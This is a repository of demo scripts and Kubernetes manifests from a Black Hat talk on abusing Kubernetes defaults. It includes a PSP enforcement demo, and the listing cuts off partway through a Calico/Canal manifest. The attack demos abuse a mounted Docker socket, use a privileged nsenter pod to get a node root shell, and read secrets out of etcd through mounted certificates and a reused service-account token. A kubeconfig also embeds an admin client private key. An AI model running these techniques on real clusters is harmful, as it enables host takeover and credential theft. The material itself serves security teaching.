├── README.md ├── demo.sh ├── demos ├── dind.sh ├── etcdlient.sh ├── k8s_root.sh └── psp-enforce.sh ├── dind ├── dind-no-privs.yaml └── dind-privs.yaml ├── etcd-attack └── etcdclient.yaml ├── images └── images ├── join.sh ├── k8s_root └── r00t.yaml ├── kind ├── admin.conf ├── canal.yaml ├── config └── fix_sysctls.sh ├── lib └── demo-magic.sh ├── podpresets └── preset.yaml ├── psp ├── allow-all-clusterrolebinding.yaml ├── allow-kubeadm-clusterrolebinding.yaml ├── allow-restricted-clusterrolebinding.yaml ├── permissive-psp.yaml ├── psp-permissive-clusterrole.yaml ├── psp-restrictive-clusterrole.yaml └── restrictive-psp.yaml └── setup.sh /README.md: -------------------------------------------------------------------------------- 1 | ## Resources for [The path less traveled: Abusing Kubernetes Defaults](https://www.blackhat.com/us-19/briefings/schedule/index.html#the-path-less-traveled-abusing-kubernetes-defaults-17049) 2 | 3 | ### [Video here](https://www.youtube.com/watch?v=HmoVSmTIOxM) 4 | 5 | This repo has all of the manifests and demo scripts used for this presentation. 6 | 7 | The cluster was built using kind.sigs.k8s.io and run entirely from the presenter laptop. 8 | 9 | You can run the [setup.sh](./setup.sh) script to populate the images that will be used 10 | 11 | Run all of the demo scripts from the root directory of this repo. 12 | 13 | The `k8s_root` and `dind` demos do require that the laptop be running some linux distribution and docker. 14 | 15 | For both of these examples we are joining the laptop to the kind cluster as a node. 16 | 17 | 18 | Other resources: 19 | 20 | - report a vuln [k8s.io/security](https://k8s.io/security) 21 | - ask questions! [slack.k8s.io](https://slack.k8s.io) #security and #sig-auth 22 | - [CVEs](https://cve.mitre.org/) are announced as part of the [announce google group](https://groups.google.com/forum/#!forum/kubernetes-announce) 23 | 24 | 25 | Any questions or feedback please reach out! 26 | 27 | [Duffie Cooley](twitter.com/mauilion) and [Ian Coldwater](twitter.com/IanColdwater) 28 | -------------------------------------------------------------------------------- /demo.sh: -------------------------------------------------------------------------------- 1 | ./demos/etcdlient.sh && ./demos/dind.sh && ./demos/k8s_root.sh && ./demos/psp-enforce.sh 2 | 3 | -------------------------------------------------------------------------------- /demos/dind.sh: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env bash 2 | 3 | ######################## 4 | # include the magic 5 | ######################## 6 | . lib/demo-magic.sh 7 | 8 | 9 | ######################## 10 | # Configure the options 11 | ######################## 12 | 13 | # 14 | # speed at which to simulate typing. bigger num = faster 15 | # 16 | # TYPE_SPEED=20 17 | 18 | # 19 | # custom prompt 20 | # 21 | # see http://www.tldp.org/HOWTO/Bash-Prompt-HOWTO/bash-prompt-escape-sequences.html for escape sequences 22 | # 23 | DEMO_PROMPT="${GREEN}➜ ${CYAN}\W " 24 | 25 | # hide the evidence 26 | clear 27 | 28 | 29 | # put your demo awesomeness here 30 | #if [ ! -d "stuff" ]; then 31 | # pe "mkdir stuff" 32 | #fi 33 | 34 | #pe "cd stuff" 35 | 36 | p "In this demo we are showing how to deploy a pod with access to the underlying docker socket" 37 | pe "vim dind/dind-no-privs.yaml" 38 | pe "kubectl apply -f dind/dind-no-privs.yaml" 39 | pe "kubectl exec dind-no-privs -- id" 40 | pe "kubectl exec dind-no-privs -- ls -al /var/run/docker.sock" 41 | p "with this setup this way I can run docker build commands and push images to repositories etc." 42 | pe "kubectl exec dind-no-privs -- docker run --name=nginx -d nginx:stable" 43 | p "we can see this container running on the underlying host" 44 | pe "docker ps -f name=nginx" 45 | pe "docker stop nginx" 46 | pe "docker rm nginx" 47 | p "what else can we do?" 48 | pe "hostname" 49 | pe "sudo touch /etc/flag" 50 | pe "kubectl exec dind-no-privs -- docker run --rm -v /etc:/host/etc bash:5 rm host/etc/flag" 51 | pe "ls -al /etc/flag" 52 | p "we have complete control over the host" 53 | 54 | # show a prompt so as not to reveal our true nature after 55 | # the demo has concluded 56 | p "" 57 | -------------------------------------------------------------------------------- /demos/etcdlient.sh: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env bash 2 | 3 | ######################## 4 | # include the magic 5 | ######################## 6 | . lib/demo-magic.sh 7 | 8 | 9 | ######################## 10 | # Configure the options 11 | ######################## 12 | 13 | # 14 | # speed at which to simulate typing. bigger num = faster 15 | # 16 | # TYPE_SPEED=20 17 | 18 | # 19 | # custom prompt 20 | # 21 | # see http://www.tldp.org/HOWTO/Bash-Prompt-HOWTO/bash-prompt-escape-sequences.html for escape sequences 22 | # 23 | DEMO_PROMPT="${GREEN}➜ ${CYAN}\W " 24 | SERVER="$(kubectl config view -o jsonpath={.clusters[0].cluster.server})" 25 | SECRET="$(kubectl get sa -n kube-system clusterrole-aggregation-controller -o jsonpath={.secrets[0].name})" 26 | TOKEN="$(kubectl get -n kube-system secret ${SECRET} -o jsonpath={.data.token}|base64 -d)" 27 | TYPE_SPEED=20 28 | # hide the evidence 29 | clear 30 | 31 | 32 | # put your demo awesomeness here 33 | #if [ ! -d "stuff" ]; then 34 | # pe "mkdir stuff" 35 | #fi 36 | 37 | #pe "cd stuff" 38 | 39 | p "etcd attack demo" 40 | pe "vim etcd-attack/etcdclient.yaml" 41 | pe "kubectl apply -f etcd-attack/" 42 | pe "kubectl exec etcdclient -- etcdctl member list" 43 | pe "kubectl exec etcdclient -- etcdctl get '' --keys-only --from-key | grep secrets" 44 | pe "kubectl exec etcdclient -- etcdctl get /registry/secrets/kube-system/${SECRET}" 45 | unset TYPE_SPEED 46 | pe "kubectl auth can-i --list --token ${TOKEN} --server=${SERVER}" 47 | TYPE_SPEED=20 48 | # show a prompt so as not to reveal our true nature after 49 | # the demo has concluded 50 | p "thanks!" 51 | p "" 52 | -------------------------------------------------------------------------------- /demos/k8s_root.sh: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env bash 2 | 3 | ######################## 4 | # include the magic 5 | ######################## 6 | . lib/demo-magic.sh 7 | 8 | 9 | ######################## 10 | # Configure the options 11 | ######################## 12 | 13 | # 14 | # speed at which to simulate typing. bigger num = faster 15 | # 16 | # TYPE_SPEED=20 17 | 18 | # 19 | # custom prompt 20 | # 21 | # see http://www.tldp.org/HOWTO/Bash-Prompt-HOWTO/bash-prompt-escape-sequences.html for escape sequences 22 | # 23 | DEMO_PROMPT="${GREEN}➜ ${CYAN}\W " 24 | 25 | kubectl create deployment nginx --image=nginx:stable 26 | kubectl scale deployment nginx --replicas 5 27 | kubectl get pods 28 | clear 29 | 30 | 31 | # put your demo awesomeness here 32 | #if [ ! -d "stuff" ]; then 33 | # pe "mkdir stuff" 34 | #fi 35 | 36 | #pe "cd stuff" 37 | 38 | pe "vim k8s_root/r00t.yaml" 39 | pe "kubectl apply -f k8s_root/r00t.yaml" 40 | pe "kubectl exec -it r00t -- nsenter --help" 41 | p "I've used nsenter to solve the mystery of how a pod is actually configured" 42 | p "first let's find the pid of an nginx process" 43 | pe "kubectl exec -ti r00t -- pgrep -a nginx" 44 | pe "kubectl exec -ti r00t -- nsenter -n -t $(pgrep nginx | head -n1) ss -ln" 45 | pe "kubectl exec -ti r00t -- nsenter -m -t $(pgrep nginx | head -n1) cat /etc/nginx/nginx.conf" 46 | p "this all works because every process has a /proc/PID/ns directory with a mapping of the namespaces that the process is bound to" 47 | pe "kubectl exec -ti r00t -- ls -al /proc/$(pgrep nginx| head -n 1)/ns" 48 | p "but what else can we do here?" 49 | p "linux is namespacing all the things all the time not just containers" 50 | p "we can use nsenter to take over the node without hostPath!" 51 | pe "kubectl exec -it r00t -- nsenter -a -t 1 bash" 52 | 53 | 54 | 55 | # show a prompt so as not to reveal our true nature after 56 | # the demo has concluded 57 | p "" 58 | -------------------------------------------------------------------------------- /demos/psp-enforce.sh: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env bash 2 | 3 | ######################## 4 | # include the magic 5 | ######################## 6 | . lib/demo-magic.sh 7 | 8 | 9 | ######################## 10 | # Configure the options 11 | ######################## 12 | 13 | # 14 | # speed at which to simulate typing. bigger num = faster 15 | # 16 | # TYPE_SPEED=20 17 | 18 | # 19 | # custom prompt 20 | # 21 | # see http://www.tldp.org/HOWTO/Bash-Prompt-HOWTO/bash-prompt-escape-sequences.html for escape sequences 22 | # 23 | DEMO_PROMPT="${GREEN}➜ ${CYAN}\W " 24 | 25 | kubectl delete clusterrolebinding allow-all-kube-system 26 | kubectl create ns secure 27 | kubectl create rolebinding secure-admin -n secure --clusterrole=admin --serviceaccount=secure:default 28 | # hide the evidence 29 | clear 30 | 31 | 32 | # put your demo awesomeness here 33 | #if [ ! -d "stuff" ]; then 34 | # pe "mkdir stuff" 35 | #fi 36 | 37 | #pe "cd stuff" 38 | p "First let's look at the pod security policies available in the cluster" 39 | pe "kubectl describe psp" 40 | p "Now let's try to deploy some of these pods with a only the restrictive psp policy in place." 41 | pe "kubectl apply -n secure -f etcd-attack/etcdclient.yaml --as system:serviceaccount:secure:default" 42 | p "what about the dind manifest" 43 | pe "kubectl apply -n secure -f dind/dind-no-privs.yaml --as system:serviceaccount:secure:default" 44 | p "we can still deploy reasonable things though! let's try nginx" 45 | pe "kubectl create -n secure deployment nginx --image=nginx:stable --as system:serviceaccount:secure:default" 46 | pe "kubectl scale -n secure deployment nginx --replicas=3 --as system:serviceaccount:secure:default" 47 | pe "kubectl get pods -n secure" 48 | # show a prompt so as not to reveal our true nature after 49 | # the demo has concluded 50 | p "" 51 | kubectl delete ns -n secure --wait=false 2>&1>/dev/null 52 | 53 | -------------------------------------------------------------------------------- /dind/dind-no-privs.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: v1 2 | kind: Pod 3 | metadata: 4 | creationTimestamp: null 5 | labels: 6 | run: dind 7 | name: dind-no-privs 8 | annotations: 9 | seccomp.security.alpha.kubernetes.io/pod: docker/default 10 | spec: 11 | securityContext: 12 | runAsUser: 1000 13 | runAsGroup: 132 14 | fsGroup: 1000 15 | containers: 16 | - image: quay.io/mauilion/dind:master 17 | name: dind 18 | resources: {} 19 | volumeMounts: 20 | - mountPath: /var/run/docker.sock 21 | name: docker-socket 22 | readOnly: true 23 | securityContext: 24 | allowPrivilegeEscalation: false 25 | capabilities: 26 | drop: 27 | - all 28 | dnsPolicy: ClusterFirst 29 | nodeName: lynx 30 | volumes: 31 | - hostPath: 32 | path: /var/run/docker.sock 33 | name: docker-socket 34 | -------------------------------------------------------------------------------- /dind/dind-privs.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: v1 2 | kind: Pod 3 | metadata: 4 | creationTimestamp: null 5 | labels: 6 | run: dind 7 | name: dind 8 | spec: 9 | containers: 10 | - image: quay.io/mauilion/dind:master 11 | name: dind 12 | resources: {} 13 | securityContext: 14 | privileged: true 15 | dnsPolicy: ClusterFirst 16 | hostPID: true 17 | volumes: 18 | - hostPath: 19 | path: /var/run/docker.sock 20 | name: docker-socket 21 | -------------------------------------------------------------------------------- /etcd-attack/etcdclient.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: v1 2 | kind: Pod 3 | metadata: 4 | creationTimestamp: null 5 | labels: 6 | component: etcdclient 7 | tier: debug 8 | name: etcdclient 9 | spec: 10 | containers: 11 | - command: 12 | - sleep 13 | - 9999d 14 | image: k8s.gcr.io/etcd:3.3.10 # using the etcd image that ships with kubernetes. 15 | name: etcdclient 16 | env: 17 | - name: ETCDCTL_API 18 | value: "3" 19 | - name: ETCDCTL_CACERT 20 | value: /etc/kubernetes/pki/etcd/ca.crt 21 | - name: ETCDCTL_CERT 22 | value: /etc/kubernetes/pki/etcd/healthcheck-client.crt 23 | - name: ETCDCTL_KEY 24 | value: /etc/kubernetes/pki/etcd/healthcheck-client.key 25 | - name: ETCDCTL_ENDPOINTS 26 | value: "https://127.0.0.1:2379" 27 | - name: ETCDCTL_CLUSTER 28 | value: "true" 29 | volumeMounts: 30 | - mountPath: /etc/kubernetes/pki/etcd 31 | name: etcd-certs 32 | readOnly: true 33 | hostNetwork: true #hostNetwork!!! 34 | nodeName: kind-control-plane #doing the work of the scheduler directly! 35 | volumes: 36 | - hostPath: #hostpath!!! 37 | path: /etc/kubernetes/pki/etcd 38 | type: DirectoryOrCreate 39 | name: etcd-certs 40 | -------------------------------------------------------------------------------- /images/images: -------------------------------------------------------------------------------- 1 | quay.io/mauilion/dind:master 2 | calico/cni:v3.8.1 3 | calico/pod2daemon-flexvol:v3.8.1 4 | calico/node:v3.8.1 5 | quay.io/coreos/flannel:v0.11.0 6 | alpine:3.7 7 | nginx:stable 8 | bash:5 9 | -------------------------------------------------------------------------------- /join.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | sudo systemctl unmask kubelet 3 | token=$(docker exec kind-control-plane kubeadm token create --print-join-command) 4 | sudo ${token} --ignore-preflight-errors=all 5 | -------------------------------------------------------------------------------- /k8s_root/r00t.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: v1 2 | kind: Pod 3 | metadata: 4 | labels: 5 | run: r00t 6 | name: r00t 7 | spec: 8 | containers: 9 | - command: 10 | - nsenter # super powerful 11 | - --mount=/proc/1/ns/mnt # mount mount namespace of the underlying node 12 | - -- 13 | - /bin/sleep 14 | - 99d 15 | image: alpine:3.7 16 | name: lol 17 | securityContext: 18 | privileged: true #crazy powers engage! 19 | dnsPolicy: ClusterFirst 20 | hostPID: true #gives us what's needed to enumerate all the processes with nsenter 21 | nodeName: lynx #host to do this to. 22 | -------------------------------------------------------------------------------- /kind/admin.conf: -------------------------------------------------------------------------------- 1 | apiVersion: v1 2 | clusters: 3 | - cluster: 4 | certificate-authority-data: LS0tLS1CRUdJTiBDRVJUSUZJQ0FURS0tLS0tCk1JSUN5RENDQWJDZ0F3SUJBZ0lCQURBTkJna3Foa2lHOXcwQkFRc0ZBREFWTVJNd0VRWURWUVFERXdwcmRXSmwKY201bGRHVnpNQjRYRFRFNU1EZ3dNakUzTkRneU9Gb1hEVEk1TURjek1ERTNORGd5T0Zvd0ZURVRNQkVHQTFVRQpBeE1LYTNWaVpYSnVaWFJsY3pDQ0FTSXdEUVlKS29aSWh2Y05BUUVCQlFBRGdnRVBBRENDQVFvQ2dnRUJBTVlZCldKUGNWRTZ6MGJNY0dkSU0wTi9MQmxkV2NqeXVkaEFNQ0dhSm4wenQwZ3hEaTJQQlJuU28rclg5cEh5WlJvWk4KalZBdzN1OXF6dVpCalk1dnpRN1pmWjdwWnI2K1Z0MFRYMVRwb05NTFBOcFpOT0MrMXJPMDQ3RU56L3VEZElxdQpOdDVLam5JNis5Ti90K0h2Ymg0cWc3UTZnbWJidXhxRk5RWHBaYnMrc2NvT2taeE5CeHdyMXRONjByU2lyaTJsClhlNm9CYTBoT1RQdEVKR05NalkwRnBvYWNvdmY3V0pmamJ4MUh4ejkycjN2TW1DM2tDRHhhc25wSFRBL3pmQVQKMzNETDlxTEZQeGFaUzVtU1FsYVRwb09YcHdIUjVFQ0hpd0pjSnd2clpUZzRZWkZ0RENWcVpCOU1LbzdCVjNDdgpVUnpBNVprN1NEU0tQN0xqK1RVQ0F3RUFBYU1qTUNFd0RnWURWUjBQQVFIL0JBUURBZ0trTUE4R0ExVWRFd0VCCi93UUZNQU1CQWY4d0RRWUpLb1pJaHZjTkFRRUxCUUFEZ2dFQkFJUmxCV1V2anF2akFIeWZFSzgrRExNSTVZNkcKQjM0dVVOc2ZyVXVsUGszZTMvaE5oMmVDUm50M2JtVVN4M3hlaU9nL2c2MHlNM0Q0NGI4MUxJZk95b2ZJY0I5Wgp2THB2RkFJdHRSOXMxNnZ4YVVlSU9ZNVNYdE55cEF2SzNya0lPaHBxbWdjQWxIYThFcVBvSjdrRUhXM2FIOXl1ClZUb2p6ZUJqMXgraDQ4SW82MTEyUXJCOVhSQjkwRHUvbkpkblVPR2k4N0gyTCtSb2kvbyt5YWd1ZmduTFZ5TkgKMVB2UTNzSk1BTWNGeHJVbFBPSW5iUUU0c3ZTTTkwampGSnF0TWYzMHEvcFVtU3A4VTltRFRNRHd6VFArRVJWZQpOdGQzcTNzdzBOOGxIZTBiSnliRHFCTk9aRWJ5elo3Y3p6ckFtdEtUVWI5RXBEbmk2bTZONnNHdUJyMD0KLS0tLS1FTkQgQ0VSVElGSUNBVEUtLS0tLQo= 5 | server: https://172.17.0.4:6443 6 | name: kind 7 | contexts: 8 | - context: 9 | cluster: kind 10 | user: kubernetes-admin 11 | name: kubernetes-admin@kind 12 | current-context: kubernetes-admin@kind 13 | kind: Config 14 | preferences: {} 15 | users: 16 | - name: kubernetes-admin 17 | user: 18 | client-certificate-data: LS0tLS1CRUdJTiBDRVJUSUZJQ0FURS0tLS0tCk1JSUM4akNDQWRxZ0F3SUJBZ0lJVG4rQU9kdmp2MjB3RFFZSktvWklodmNOQVFFTEJRQXdGVEVUTUJFR0ExVUUKQXhNS2EzVmlaWEp1WlhSbGN6QWVGdzB4T1RBNE1ESXhOelE0TWpoYUZ3MHlNREE0TURFeE56UTRNekphTURReApGekFWQmdOVkJBb1REbk41YzNSbGJUcHRZWE4wWlhKek1Sa3dGd1lEVlFRREV4QnJkV0psY201bGRHVnpMV0ZrCmJXbHVNSUlCSWpBTkJna3Foa2lHOXcwQkFRRUZBQU9DQVE4QU1JSUJDZ0tDQVFFQXJBbE1JVkFJNXlGOWtvc2kKY0djdHBka0NUa293ZVVRZmtxTkY4RHRPUlVDRXFXeFRNdlA1QzdxNFFzUitQd0FIc1AwcHVWN2M2Wjhya2xsVQoyLzdYUGRuQXZLUnpUOHVhT2JJQ20wSDJJMDVCUithV0plcDR1Y0ExdUJ1SW5Jd3hYZEhsS0pjWmJnTnc0RGlrClFxcVc2S3QwWlpVUUsrV0lZdUxENjFtaXBHZ1NsSDVYeDBpd1VaT3NRTjNkbDBodkk0cTlpb1lpa1pJazM1MWYKVzZHaVNNS2QxTEh3ci8zNnZvZG1JMFNxODNyWTRkTjBTM0lUTEQzQWNKSFdFYlNlam9OQS9tN3N0eXJ5Ym4zdQo2MzFURmZMczVMK1F1bk1qYzhGQ1oyYkpaam13MDIvRFhFSEh4OVFzNDAweTdLKzJwaDEvY0cxSmRLSDREYStECnFLSjRuUUlEQVFBQm95Y3dKVEFPQmdOVkhROEJBZjhFQkFNQ0JhQXdFd1lEVlIwbEJBd3dDZ1lJS3dZQkJRVUgKQXdJd0RRWUpLb1pJaHZjTkFRRUxCUUFEZ2dFQkFCQmtBVXRmcU9ZTllKc3hvTkVYWlMwVDc2SzdVL2o2Rks5TApxRHVHWXNLeGN2RWFKc05vNDU4Nm51ZEN3NkZyaVFWdUNYTGdxdzFCVkZCVmxLQy9KdFFVUWxadzFwZTdZWGZqCjIzMXFoT2NMMEN6aXMrN3NrdkNMdkJGQTZXNmVyNjVOU0F0b3ZDcHZHbWdRQmEzMGh1RkR6ajdiUUVhblRETjQKaWFRYTZ6RGRCYXFua3JjNTZxTm8vOWU2RW5iaTA2cmh2VzV3Wklwckx5YThIamtPcVRsajFtMGVxQ1NTczRCdQpTVEtzOWJWZWt5YVovbTd2SnFFYURwbUZUU1pVaHQvdk44WTNVVkZvVTB2Ym5NTGUxVjlrYkRKUVlTQmM0OHFqCjlYb29FbDRNK0pYQThzVWdjeFRSMklOajRDNDhTUmkwNU83N21sL3Q5T2JGbERLdzRKVT0KLS0tLS1FTkQgQ0VSVElGSUNBVEUtLS0tLQo= 19 | client-key-data: LS0tLS1CRUdJTiBSU0EgUFJJVkFURSBLRVktLS0tLQpNSUlFb2dJQkFBS0NBUUVBckFsTUlWQUk1eUY5a29zaWNHY3RwZGtDVGtvd2VVUWZrcU5GOER0T1JVQ0VxV3hUCk12UDVDN3E0UXNSK1B3QUhzUDBwdVY3YzZaOHJrbGxVMi83WFBkbkF2S1J6VDh1YU9iSUNtMEgySTA1QlIrYVcKSmVwNHVjQTF1QnVJbkl3eFhkSGxLSmNaYmdOdzREaWtRcXFXNkt0MFpaVVFLK1dJWXVMRDYxbWlwR2dTbEg1WAp4MGl3VVpPc1FOM2RsMGh2STRxOWlvWWlrWklrMzUxZlc2R2lTTUtkMUxId3IvMzZ2b2RtSTBTcTgzclk0ZE4wClMzSVRMRDNBY0pIV0ViU2Vqb05BL203c3R5cnlibjN1NjMxVEZmTHM1TCtRdW5NamM4RkNaMmJKWmptdzAyL0QKWEVISHg5UXM0MDB5N0srMnBoMS9jRzFKZEtINERhK0RxS0o0blFJREFRQUJBb0lCQUg5YnZxMW10OENNRFk5ZwpTMVdWUExqcnA0Wlg2L3pLVHVsYTBCcmhmTGRONVNnYjFwZ0EvNTBNVlA2d3dwbFhKMXFDZ05JSGhWbTZpU0lsCjJlbW5ocWIyUG5ZbzlHamRYTVpibnd4YlQ2R2hmRGlEWHlLZ3ExRXdGMVM5cFd2bmFXQ0FVN3F4NlpTRkhab1EKdEtIWjhqQTdSY2N5REMvREZDM0luS3Z0eHJjWVVmZGZXRGNuV1NFR2ZNYzltMUYyczlYaWdzY2EyZ0M1bXh2OAp1WVpBRkREU05BUVRreWxDVW52eWpvNGhheFM0d3hUaUIrWXZicytKcEdra2U2RFZuaktHNkFjN2pCM2NJWENZCitMa1lhckxZeUVESitPSytXQnQwYzlmeWEyNkVoYXJGOEdBMmRXMzdmSnFnM2tnOFQxN29NWFlaWlMzVjZESVEKQVBuQ3JPMENnWUVBMG9NTU9FamdueFE2M2t0VkpyLzEwYWs1K0c5djNrd2txWk5BZkxEcEtuTVFnZ3B3VUJISgprdkFuVmVOeDlTUkgweVNVNmxvRHJGam04V3BtcVZIeGRNU3g1cnJTU1ZCWHpCVm14NmZhQ09CNWVkS21GRUI1CkJRRElwS0JMd2pkSGkySE5MZmh5RXB6SlFqdW1ZZmxoTExHVUYyNDhCWFl0R2dHbHpjckRFVk1DZ1lFQTBUWGkKT0J4K0p6MmMzS1BJZmwzSW4xMGFYRVk1YmNDRHdTNnpBQ0F1ei9xdWt2d1lWbWoveTN1dEtwU29wOFhzamtmMwoyeUdvSHc5Y3QvamlDekJZZzdHaWtYWDZjb1gxeXpGUENQeS9VSUNhbmZjMFBBcVZadUYxU0ZxNE5vajM4RnIrCjVvS1FUVWJiQTNGN0J1bWpHaWZUbmtxcWV5OVpIanNFMHYwcllFOENnWUJ2U3dreTJKU29oYkY1eEtvSUNvU1QKaTd3eU0vZ1l0bmpMamlZUnhoWC9jMFhPK21YV2J4RDZ0aXlWbytHamtNTElSaGJVcnpJeDgrNWt3N1B5NEhlZgpIRDVSbFlPSGJ3cDd3dlRMcVZvRVIyanhsd1Jtd0k4NnJlZGw0YmtydkwzK1duNTNSMXBIck14YVQ5N3UvVUQ2CnVBZHJPOFJQdnVLcFZTV3JYdjh5TVFLQmdBZFI0RkZnUmRXdnBTNWZHS083T2tyQklpdjZWUVlQQjAwYUNpOUYKOFAxYjR3SEhpajV6dkFkdGsxaDdEUStac0RZbU5IalpTNTJTbHdiazBWdmMzQ3YzYWgyMnlBVjd4R2JRbWRoUgpwNHYwZy9Sazh0SHErT0U1b0RYZzNyTWh4Yk1HTEFiNnFIdmJyOHdHQzJ6cGZjaHJmazc2Zzg1OWtKdXJLdmNLCjNwcW5Bb0dBSWRUdkhMQ3VOeHEvcCthTWx1OWdpNFdFTytuTG1WdHYvNjRyb1ZHeklzeXRDcVlXRC9STUVQZ20KZmZxNVg5ZkY1RVhTa2NkWXllVFVNa2kzaVhLSVQxZ2VNM3plK0FHN3B4dlltVW1VR0NzVVc5REhqMHVLdW1Cbgo3UVBDQUV4M3pENE9ycDRRa1JvdkZhTCtRdWQrYlk1MEJwTkRPNTZoaklIamtEaUFEcTA9Ci0tLS0tRU5EIFJTQSBQUklWQVRFIEtFWS0tLS0tCg== 20 | -------------------------------------------------------------------------------- /kind/canal.yaml: -------------------------------------------------------------------------------- 1 | --- 2 | # Source: calico/templates/calico-config.yaml 3 | # This ConfigMap is used to configure a self-hosted Canal installation. 4 | kind: ConfigMap 5 | apiVersion: v1 6 | metadata: 7 | name: canal-config 8 | namespace: kube-system 9 | data: 10 | # Typha is disabled. 11 | typha_service_name: "none" 12 | # The interface used by canal for host <-> host communication. 13 | # If left blank, then the interface is chosen using the node's 14 | # default route. 15 | canal_iface: "" 16 | 17 | # Whether or not to masquerade traffic to destinations not within 18 | # the pod network. 19 | masquerade: "true" 20 | 21 | # The CNI network configuration to install on each node. The special 22 | # values in this config will be automatically populated. 23 | cni_network_config: |- 24 | { 25 | "name": "k8s-pod-network", 26 | "cniVersion": "0.3.1", 27 | "plugins": [ 28 | { 29 | "type": "calico", 30 | "log_level": "info", 31 | "datastore_type": "kubernetes", 32 | "nodename": "__KUBERNETES_NODE_NAME__", 33 | "ipam": { 34 | "type": "host-local", 35 | "subnet": "usePodCidr" 36 | }, 37 | "policy": { 38 | "type": "k8s" 39 | }, 40 | "kubernetes": { 41 | "kubeconfig": "__KUBECONFIG_FILEPATH__" 42 | } 43 | }, 44 | { 45 | "type": "portmap", 46 | "snat": true, 47 | "capabilities": {"portMappings": true} 48 | } 49 | ] 50 | } 51 | 52 | # Flannel network configuration. Mounted into the flannel container. 53 | net-conf.json: | 54 | { 55 | "Network": "10.244.0.0/16", 56 | "Backend": { 57 | "Type": "vxlan" 58 | } 59 | } 60 | 61 | --- 62 | # Source: calico/templates/kdd-crds.yaml 63 | apiVersion: apiextensions.k8s.io/v1beta1 64 | kind: CustomResourceDefinition 65 | metadata: 66 | name: felixconfigurations.crd.projectcalico.org 67 | spec: 68 | scope: Cluster 69 | group: crd.projectcalico.org 70 | version: v1 71 | names: 72 | kind: FelixConfiguration 73 | plural: felixconfigurations 74 | singular: felixconfiguration 75 | --- 76 | 77 | apiVersion: apiextensions.k8s.io/v1beta1 78 | kind: CustomResourceDefinition 79 | metadata: 80 | name: bgpconfigurations.crd.projectcalico.org 81 | spec: 82 | scope: Cluster 83 | group: crd.projectcalico.org 84 | version: v1 85 | names: 86 | kind: BGPConfiguration 87 | plural: bgpconfigurations 88 | singular: bgpconfiguration 89 | 90 | --- 91 | 92 | apiVersion: apiextensions.k8s.io/v1beta1 93 | kind: CustomResourceDefinition 94 | metadata: 95 | name: ippools.crd.projectcalico.org 96 | spec: 97 | scope: Cluster 98 | group: crd.projectcalico.org 99 | version: v1 100 | names: 101 | kind: IPPool 102 | plural: ippools 103 | singular: ippool 104 | 105 | --- 106 | 107 | apiVersion: apiextensions.k8s.io/v1beta1 108 | kind: CustomResourceDefinition 109 | metadata: 110 | name: hostendpoints.crd.projectcalico.org 111 | spec: 112 | scope: Cluster 113 | group: crd.projectcalico.org 114 | version: v1 115 | names: 116 | kind: HostEndpoint 117 | plural: hostendpoints 118 | singular: hostendpoint 119 | 120 | --- 121 | 122 | apiVersion: apiextensions.k8s.io/v1beta1 123 | kind: CustomResourceDefinition 124 | metadata: 125 | name: clusterinformations.crd.projectcalico.org 126 | spec: 127 | scope: Cluster 128 | group: crd.projectcalico.org 129 | version: v1 130 | names: 131 | kind: ClusterInformation 132 | plural: clusterinformations 133 | singular: clusterinformation 134 | 135 | --- 136 | 137 | apiVersion: apiextensions.k8s.io/v1beta1 138 | kind: CustomResourceDefinition 139 | metadata: 140 | name: globalnetworkpolicies.crd.projectcalico.org 141 | spec: 142 | scope: Cluster 143 | group: crd.projectcalico.org 144 | version: v1 145 | names: 146 | kind: GlobalNetworkPolicy 147 | plural: globalnetworkpolicies 148 | singular: globalnetworkpolicy 149 | 150 | --- 151 | 152 | apiVersion: apiextensions.k8s.io/v1beta1 153 | kind: CustomResourceDefinition 154 | metadata: 155 | name: globalnetworksets.crd.projectcalico.org 156 | spec: 157 | scope: Cluster 158 | group: crd.projectcalico.org 159 | version: v1 160 | names: 161 | kind: GlobalNetworkSet 162 | plural: globalnetworksets 163 | singular: globalnetworkset 164 | 165 | --- 166 | 167 | apiVersion: apiextensions.k8s.io/v1beta1 168 | kind: CustomResourceDefinition 169 | metadata: 170 | name: networkpolicies.crd.projectcalico.org 171 | spec: 172 | scope: Namespaced 173 | group: crd.projectcalico.org 174 | version: v1 175 | names: 176 | kind: NetworkPolicy 177 | plural: networkpolicies 178 | singular: networkpolicy 179 | 180 | --- 181 | 182 | apiVersion: apiextensions.k8s.io/v1beta1 183 | kind: CustomResourceDefinition 184 | metadata: 185 | name: networksets.crd.projectcalico.org 186 | spec: 187 | scope: Namespaced 188 | group: crd.projectcalico.org 189 | version: v1 190 | names: 191 | kind: NetworkSet 192 | plural: networksets 193 | singular: networkset 194 | --- 195 | # Source: calico/templates/rbac.yaml 196 | 197 | # Include a clusterrole for the calico-node DaemonSet, 198 | # and bind it to the calico-node serviceaccount. 199 | kind: ClusterRole 200 | apiVersion: rbac.authorization.k8s.io/v1 201 | metadata: 202 | name: calico-node 203 | rules: 204 | # The CNI plugin needs to get pods, nodes, and namespaces. 205 | - apiGroups: [""] 206 | resources: 207 | - pods 208 | - nodes 209 | - namespaces 210 | verbs: 211 | - get 212 | - apiGroups: [""] 213 | resources: 214 | - endpoints 215 | - services 216 | verbs: 217 | # Used to discover service IPs for advertisement. 218 | - watch 219 | - list 220 | # Used to discover Typhas. 221 | - get 222 | - apiGroups: [""] 223 | resources: 224 | - nodes/status 225 | verbs: 226 | # Needed for clearing NodeNetworkUnavailable flag. 227 | - patch 228 | # Calico stores some configuration information in node annotations. 229 | - update 230 | # Watch for changes to Kubernetes NetworkPolicies. 231 | - apiGroups: ["networking.k8s.io"] 232 | resources: 233 | - networkpolicies 234 | verbs: 235 | - watch 236 | - list 237 | # Used by Calico for policy information. 238 | - apiGroups: [""] 239 | resources: 240 | - pods 241 | - namespaces 242 | - serviceaccounts 243 | verbs: 244 | - list 245 | - watch 246 | # The CNI plugin patches pods/status. 247 | - apiGroups: [""] 248 | resources: 249 | - pods/status 250 | verbs: 251 | - patch 252 | # Calico monitors various CRDs for config. 253 | - apiGroups: ["crd.projectcalico.org"] 254 | resources: 255 | - globalfelixconfigs 256 | - felixconfigurations 257 | - bgppeers 258 | - globalbgpconfigs 259 | 